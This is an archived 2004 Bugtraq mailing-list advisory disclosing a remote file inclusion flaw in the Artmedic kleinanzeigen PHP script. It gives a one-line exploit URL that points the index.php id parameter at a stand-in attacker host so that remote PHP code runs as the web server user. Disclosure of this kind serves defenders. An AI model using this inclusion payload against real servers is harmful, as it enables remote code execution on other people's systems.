[35796] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Artmedic kleinanzeigen include vulnerability

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Tue Jul 20 00:52:44 2004

Date: 19 Jul 2004 02:25:16 -0000
Message-ID: <20040719022516.2838.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com



Artmedic kleinanzeigen allow code inclusion in index.php. 
 
Exploit: 
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 
 
An evil attacker could be use this vulnerability to execute 
php code with the same user id of the running server. 
 
Thanks and sorry for the bad english 
Dominus_Vis from Infektion Group :> 
irc.phey.net -j #infektion


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[35796] in bugtraq

Artmedic kleinanzeigen include vulnerability

daemon@ATHENA.MIT.EDU (Francisco Alisson)Tue Jul 20 00:52:44 2004

daemon@ATHENA.MIT.EDU (Francisco Alisson)
Tue Jul 20 00:52:44 2004